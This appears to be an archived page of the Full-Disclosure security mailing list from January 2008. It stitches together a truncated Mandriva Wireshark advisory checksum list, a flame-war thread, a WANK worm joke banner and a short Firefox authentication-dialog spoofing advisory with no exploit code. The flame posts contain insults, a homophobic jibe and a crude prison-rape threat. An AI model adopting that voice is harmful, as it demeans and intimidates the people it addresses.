 3bc0b4bab65defa5bf6e35759031fcb7  
2007.0/i586/wireshark-0.99.7-0.1mdv2007.0.i586.rpm
 c0c54d8444367c6183c62cece8cac049  
2007.0/i586/wireshark-tools-0.99.7-0.1mdv2007.0.i586.rpm 
 7968c27be369f6b1f420fa24a4a515a1  
2007.0/SRPMS/libsmi-0.4.5-2.2mdv2007.0.src.rpm
 93d4485e496435ada84767d57f7c1225  
2007.0/SRPMS/wireshark-0.99.7-0.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 5f6ce5ab3aec1f5127103b072bd119f8  
2007.0/x86_64/lib64smi2-0.4.5-2.2mdv2007.0.x86_64.rpm
 be3c430ecada008c60cf35e286825708  
2007.0/x86_64/lib64smi2-devel-0.4.5-2.2mdv2007.0.x86_64.rpm
 c6fe3c1044e2dd49e6ba317ccb894584  
2007.0/x86_64/lib64wireshark0-0.99.7-0.1mdv2007.0.x86_64.rpm
 9d8536864c09ad40dd4224fa3b0d574d  
2007.0/x86_64/libsmi-mibs-ext-0.4.5-2.2mdv2007.0.x86_64.rpm
 6f038a40025193ca8051b0460fb7caa5  
2007.0/x86_64/libsmi-mibs-std-0.4.5-2.2mdv2007.0.x86_64.rpm
 68369d61905e99fe3ccaf53f5e57bc8e  
2007.0/x86_64/smi-tools-0.4.5-2.2mdv2007.0.x86_64.rpm
 c26ac8fc5775cd607c661690329ab1e1  
2007.0/x86_64/tshark-0.99.7-0.1mdv2007.0.x86_64.rpm
 d459878bb96b1876b5bd6bb474e4a7ce  
2007.0/x86_64/wireshark-0.99.7-0.1mdv2007.0.x86_64.rpm
 0f8cb96e05b83022fb31444bc01e08c3  
2007.0/x86_64/wireshark-tools-0.99.7-0.1mdv2007.0.x86_64.rpm 
 7968c27be369f6b1f420fa24a4a515a1  
2007.0/SRPMS/libsmi-0.4.5-2.2mdv2007.0.src.rpm
 93d4485e496435ada84767d57f7c1225  
2007.0/SRPMS/wireshark-0.99.7-0.1mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 d4f8fcfde7e4a5f547282829163a6838  
2007.1/i586/libsmi-mibs-ext-0.4.5-2.2mdv2007.1.i586.rpm
 be6c823a10d7dd7ea3b23da1606e30a7  
2007.1/i586/libsmi-mibs-std-0.4.5-2.2mdv2007.1.i586.rpm
 ae2f88e691ebb0b376a136fa2f7a5949  
2007.1/i586/libsmi2-0.4.5-2.2mdv2007.1.i586.rpm
 245b8d9a9b8f85437f8c4aebb81479c6  
2007.1/i586/libsmi2-devel-0.4.5-2.2mdv2007.1.i586.rpm
 8fe776c3019f672043e5346fd4462995  
2007.1/i586/libwireshark0-0.99.7-0.1mdv2007.1.i586.rpm
 42fb7f4c0baaed536c933adc1e4cb07c  
2007.1/i586/smi-tools-0.4.5-2.2mdv2007.1.i586.rpm
 1fefa448daf9412b9475a1fcb908ddc4  
2007.1/i586/tshark-0.99.7-0.1mdv2007.1.i586.rpm
 6df4f1564d1d20087b87ad12c2afc7d8  
2007.1/i586/wireshark-0.99.7-0.1mdv2007.1.i586.rpm
 18263c6e83de541e5c241ee90e6c07d7  
2007.1/i586/wireshark-tools-0.99.7-0.1mdv2007.1.i586.rpm 
 db3984a957602d0d4d9

Re: [Full-disclosure] Critical Vulnerability in [Full-Disclosure]

[reepex]

So you included me in here because my name has something to do with farm
equipment? Did your message have a point?

You wrote a bunch of nonsense flattering your favorite security stars and
then attempted to flame us with one liners that did not make sense.. It
seems you are caught in between the serious posters ( since you have no
skill, you cannot post anything useful), and the trolls ( because you are
not funny or convincing ).

My version of full disclosure is calling out idiots with Cissps and Phds who
post here and think their XSS and earth shattering barragess of 0x41's makes
them security experts.

On Jan 2, 2008 10:46 AM, <[EMAIL PROTECTED]> wrote:

> Critical Vulnerability in [Full-Disclosure]
>
> The problem with full disclosure is that everyone feels the need to
> fully disclose, even when their opinion and the information they
> are purporting to impart is, well, bollocks. You can't tell them to
> shut up as they think they're important and the internet gives them
> balls of steel and verbal diarhoea, so we stumble from one tired
> flamewar to another with no useful content being published.
>
> It's embarrassing.
>
> I'm an advocate of FD as a concept. I believe that there is no such
> thing as an innocent on the internet and if you really are that
> dumb, then you deserve everything you get. FD (as one of many like-
> minded lists) forces the vendors to patch or die and eventually
> write quality code. FD (the concept, not the list) is the ultimate
> nuclear deterrent, without the mutually assured destruction lunacy.
>
> I have watched the posters to this list for some time. By far the
> vast majority are transparently kiddies, sitting on their painted-
> up laptops thinking of themselves as the techno-brats in the film
> "Hackers" and hoping to grow up to be like the guy in the film
> "Swordfish". They write in l33t5p34k and think that this somehow
> makes them informed. Kiddies are the lowest form of life in the
> hierarchy of information security and in the IT industry generally.
>
> You know who you are and so does everyone else. You are fools, and
> an embarrassment to the craft:
> Secreview (review of products/services you have never bought, are
> you the goatse.cz receiver?)
> Reepex (Isn't a reepex a bit of farm machinery?)
> Gobbles (A nickname for a gay male prostitute)
> Morning Wood (The holy grail of the viagra-abuser)
> Gmaggro ("high value target selection", are you completely cocking
> stupid?)
>
> Oh, the outrage.
>
> I can see it now. there will be armies of skiddies demanding that
> the l33tz hack this [EMAIL PROTECTED], spam him, pwn him, and post defamatory
> messages concerning her skills and possible employment
> opportunities for her and her mother everywhere possible. Guess
> what, kids? I don't care.
>
> No, not even a little bit. Do what you like, I could care less and
> no one else cares if you live or die tonight, you sad, acne'd
> little dewdrops.
>
> Calmed down yet?
>
> Good. I want you to consider something.
>
> The FD list consists of the following content (and what it has to
> say):
>
> Advisories by vendors (we fixed this)
> Advisories by individuals (I tested that and found this)
> Advisories by infosec organisations (we found this)
> Funnies (self explanatory)
> Opinions (this sucks, what about that?)
> Skids (I did this, aren't I great, everyone else sucks?)
> Trolls (you suck)
> Trawlers (I have something 0day to buy or sell)
>
> The top three (ie the useful content) is available in any one of a
> hundred places, the bottom three are noise. The only people
> interested in the noise are those who keep track of it for a
> living.
>
> So, consider that by posting anything in the bottom three
> categories, you are drawing the attention of those who take an
> interest in your sad efforts to destabilise the technical crutch of
> society. These people are better than you in every important way,
> and if you so much as tiptoe across one of their lines, you'll wind
> up sharing a cell with a 7ft gorilla called george with a dead
> mouse and a pressing need to dry-cornhole your ringpiece 3 times a
> night and twice on sundays. Do yourselves a favour and STFU.
>
> What's left?
>
> The funnies and the opinions. I've laughed my tits off at posts by
> Mssrs Coderman, Diggle, Dripping, VanWinkle and Mengele, and i've
> been interested by a few others who will remain nameless as I can't
> list them all. Long live full disclosure, but keep in mind that
> you're only legends in your own bedrooms.
>
> later, pi
>
> --
> Click to get a free auto insurance quotes from top companies.
>
> http://tagline.hushmail.com/fc/Ioyw6h4d8EIl5uJlSoB5C7HKVmuBsQOXlKB8YUus2MT2FpMkQCNmCM/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: h

Re: [Full-disclosure] Was secreview crap - now OpenVMS!!

[list spam]

  W O R M SA G A I N S TN U C L E A RK I L L E R S
 ___
 \__    _     __  _/
  \ \ \/\/ // /\ \   | \ \  | || | / //
   \ \ \  /  \  / // /__\ \  | |\ \ | || |/ //
\ \ \/ /\ \/ // __ \ | | \ \| || |\ \   /
 \_\  /__\  // /__\ \| |__\ | || |_\ \_/
  \___/
   \ /
\Your System Has Been Officically WANKed/
 \_/



On Jan 3, 2008 6:32 AM, <[EMAIL PROTECTED]> wrote:

> On Wed, 02 Jan 2008 14:13:48 EST, "Randal T. Rioux" said:
>
> > OpenVMS is less than 40% Blissful...
>
> Obviously, it's migrated over the years.  Back in the late 80's when it
> was at its most prevalent (and before it got 'Open' attached to it - we're
>
> talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily
> Bliss32..
>
> > Security relevance: UNHACKABLE! 
>
> WANK! (The old-timers will know what that means, and it's not what you
> newbies
> think... ;)
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Critical Vulnerability in [Full-Disclosure]

[scott]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

An your earth-shattering views are *SO* important,you must make sure
everyone hears you.I think you just like to see your own posts.

I'm filtering your posts from now on as they are nothing but from a
wanna-be trying to play kids games in a mans world.

I shouldn't waste my time responding to a teeny- bopper,anyway.

Scott
reepex wrote:
> So you included me in here because my name has something to do with farm
> equipment? Did your message have a point?
>
> You wrote a bunch of nonsense flattering your favorite security stars and
> then attempted to flame us with one liners that did not make sense.. It
> seems you are caught in between the serious posters ( since you have no
> skill, you cannot post anything useful), and the trolls ( because you are
> not funny or convincing ).
>
> My version of full disclosure is calling out idiots with Cissps and
Phds who
> post here and think their XSS and earth shattering barragess of 0x41's
makes
> them security experts.
>
> On Jan 2, 2008 10:46 AM, <[EMAIL PROTECTED]> wrote:
>
>> Critical Vulnerability in [Full-Disclosure]
>>
>> The problem with full disclosure is that everyone feels the need to
>> fully disclose, even when their opinion and the information they
>> are purporting to impart is, well, bollocks. You can't tell them to
>> shut up as they think they're important and the internet gives them
>> balls of steel and verbal diarhoea, so we stumble from one tired
>> flamewar to another with no useful content being published.
>>
>> It's embarrassing.
>>
>> I'm an advocate of FD as a concept. I believe that there is no such
>> thing as an innocent on the internet and if you really are that
>> dumb, then you deserve everything you get. FD (as one of many like-
>> minded lists) forces the vendors to patch or die and eventually
>> write quality code. FD (the concept, not the list) is the ultimate
>> nuclear deterrent, without the mutually assured destruction lunacy.
>>
>> I have watched the posters to this list for some time. By far the
>> vast majority are transparently kiddies, sitting on their painted-
>> up laptops thinking of themselves as the techno-brats in the film
>> "Hackers" and hoping to grow up to be like the guy in the film
>> "Swordfish". They write in l33t5p34k and think that this somehow
>> makes them informed. Kiddies are the lowest form of life in the
>> hierarchy of information security and in the IT industry generally.
>>
>> You know who you are and so does everyone else. You are fools, and
>> an embarrassment to the craft:
>> Secreview (review of products/services you have never bought, are
>> you the goatse.cz receiver?)
>> Reepex (Isn't a reepex a bit of farm machinery?)
>> Gobbles (A nickname for a gay male prostitute)
>> Morning Wood (The holy grail of the viagra-abuser)
>> Gmaggro ("high value target selection", are you completely cocking
>> stupid?)
>>
>> Oh, the outrage.
>>
>> I can see it now. there will be armies of skiddies demanding that
>> the l33tz hack this [EMAIL PROTECTED], spam him, pwn him, and post defamatory
>> messages concerning her skills and possible employment
>> opportunities for her and her mother everywhere possible. Guess
>> what, kids? I don't care.
>>
>> No, not even a little bit. Do what you like, I could care less and
>> no one else cares if you live or die tonight, you sad, acne'd
>> little dewdrops.
>>
>> Calmed down yet?
>>
>> Good. I want you to consider something.
>>
>> The FD list consists of the following content (and what it has to
>> say):
>>
>> Advisories by vendors (we fixed this)
>> Advisories by individuals (I tested that and found this)
>> Advisories by infosec organisations (we found this)
>> Funnies (self explanatory)
>> Opinions (this sucks, what about that?)
>> Skids (I did this, aren't I great, everyone else sucks?)
>> Trolls (you suck)
>> Trawlers (I have something 0day to buy or sell)
>>
>> The top three (ie the useful content) is available in any one of a
>> hundred places, the bottom three are noise. The only people
>> interested in the noise are those who keep track of it for a
>> living.
>>
>> So, consider that by posting anything in the bottom three
>> categories, you are drawing the attention of those who take an
>> interest in your sad efforts to destabilise the technical crutch of
>> society. These people are better than you in every important way,
>> and if you so much as tiptoe across one of their lines, you'll wind
>> up sharing a cell with a 7ft gorilla called george with a dead
>> mouse and a pressing need to dry-cornhole your ringpiece 3 times a
>> night and twice on sundays. Do yourselves a favour and STFU.
>>
>> What's left?
>>
>> The funnies and the opinions. I've laughed my tits off at posts by
>> Mssrs Coderman, Diggle, Dripping, VanWinkle and Mengele, and i've
>> been interested by a few others who will remain nameless as I can't
>> list them all. Long live full disclosure, but keep in mind that
>> you're only legends in your

[Full-disclosure] Yet another Dialog Spoofing Vulnerability - Firefox Basic Authentication

[avivra]

Summary
Mozilla Firefox allows spoofing the information presented in the basic
authentication dialog box. This can allow an attacker to conduct phishing
attacks, by tricking the user to believe that the authentication dialog box
is from a trusted website.

Affected versions
Mozilla Firefox v2.0.0.11. 
Prior versions and other Mozilla products may also be affected.

http://aviv.raffon.net/2008/01/02/YetAnotherDialogSpoofingFirefoxBasicAuthen
tication.aspx


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/